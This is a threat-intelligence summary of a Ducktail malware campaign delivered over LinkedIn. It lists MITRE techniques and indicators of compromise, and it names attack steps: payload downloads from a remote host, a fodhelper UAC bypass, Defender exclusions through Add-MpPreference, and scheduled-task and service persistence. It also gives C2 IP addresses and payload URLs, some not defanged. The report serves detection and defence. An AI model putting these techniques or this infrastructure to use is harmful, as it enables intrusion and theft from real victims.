eSentire’s TRU team analyzed a Ducktail malware attempt delivered via LinkedIn, featuring multi-stage PowerShell payloads, obfuscated scripts, and UAC bypass techniques. The campaign culminated in a remote command-and-control setup with persistence via scheduled tasks and a Windows service, highlighting defender evasion and lateral persistence risks. #Ducktail #Kaseya #more_eggs #LinkedIn
Keypoints
- The attack surface involved LinkedIn-mediated delivery of a ZIP containing oversized shortcuts that execute PowerShell on a target employee in digital marketing.
- Shortcuts unlock base64-encoded strings that decode to a PowerShell script used to fetch additional payloads from a remote host.
- UAC bypass and privilege escalation techniques are employed, including fodhelper.exe, with fallback to admin-privileged downloads and DLL overwrites.
- Defender evasion includes querying for antivirus activity and adding exclusions (Add-MpPreference -ExclusionPath) to C:WindowsTemp.
- Payloads establish a C2 connection, download mainbot.exe and myRdpService.exe, and create persistence via a scheduled task and a Windows service.
- The campaign demonstrates extensive use of obfuscation, retries for downloads, and eventual remote control over the infected host.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The attacker contacted the employee via LinkedIn with an attachment leading to a ZIP archive. “The ZIP archive contains bloated shortcuts that are over 800MB in size.”
- [T1059.001] PowerShell – The shortcuts contain batch scripts that execute PowerShell commands. “The shortcuts contain the batch scripts that execute PowerShell commands.”
- [T1105] Ingress Tool Transfer – The script downloads files from a remote host. “The script downloads the file from hxxps://gdfsgfdrgetgergdsf[.]tech/file/ps/5f8f8c05db68cca200c6379b825648b5.jpg (MD5: 5f8f8c05db68cca200c6379b825648b5).”
- [T1548.002] Bypass User Account Control – UAC bypass with fodhelper.exe to download and execute payloads. “If UAC is enabled, it attempts a UAC bypass technique using fodhelper.exe …”
- [T1562.001] Impair Defenses – Defender exclusion via Add-MpPreference to bypass detections. “adds an exclusion path to it using Add-MpPreference -ExclusionPath.”
- [T1053] Scheduled Task – Creates a scheduled task to run the downloaded file with SYSTEM privileges at logon. “The threat creates a new scheduled task (zServicequyet) to execute the downloaded file … set to trigger at logon.”
- [T1543.003] Create Windows Service – Creates a service (myRdpService) to run payloads. “The service “myRdpService” is created to start myRdpService.exe with an argument “quyet” …”
- [T1136] Create Account – Attempts to create a local user “User1” on the infected machine. “attempts to create the user “User1” on infected machine.”
- [T1071.001] Web Protocols – Uses HTTP/HTTPS to communicate with C2 and receive commands. “establishing the connection with the C2 server and taking remote commands.”
- [T1027] Obfuscated/Compressed Files and Information – Uses base64 encoding and XOR-based decryption to obfuscate payloads. “base64-encoded strings that decodes to the script” and “hardcoded XOR key”
Indicators of Compromise
- [Hash] MD5 – 5f8f8c05db68cca200c6379b825648b5, 5be7408b84fbd40c8e7930f4c28a585a, and 1ade74bbf88c1a41a352682a8f2265f9
- [URL] hxxps://gdfsgfdrgetgergdsf[.]tech/file/ps/5f8f8c05db68cca200c6379b825648b5.jpg, hxxp://gdfsgfdrgetgergdsf[.]tech/file/docs/
- [URL] hxxps://gdfsgfdrgetgergdsf[.]tech/file/ps/d4e1a9191216420ce7989cf6c3e203cd.jpg
- [URL] http://138.201.8.186:8000/file/rdpwrap.txt, http://138.201.8.186:8000/file/t/RdpService.exe
- [IP] 138.201.8.186:8000, 23.88.71.29:8000, 138.201.8.186:8001
- [Domain] gdfsgfdrgetgergdsf.tech
- [File] mainbot.exe, svczHost.exe, myRdpService.exe, propsys.dll
- [File] 5be7408b84fbd40c8e7930f4c28a585a.jpg (and related decoy/ps files)
Read more: https://www.esentire.com/blog/ducktail-and-peeling-the-layers-of-powershell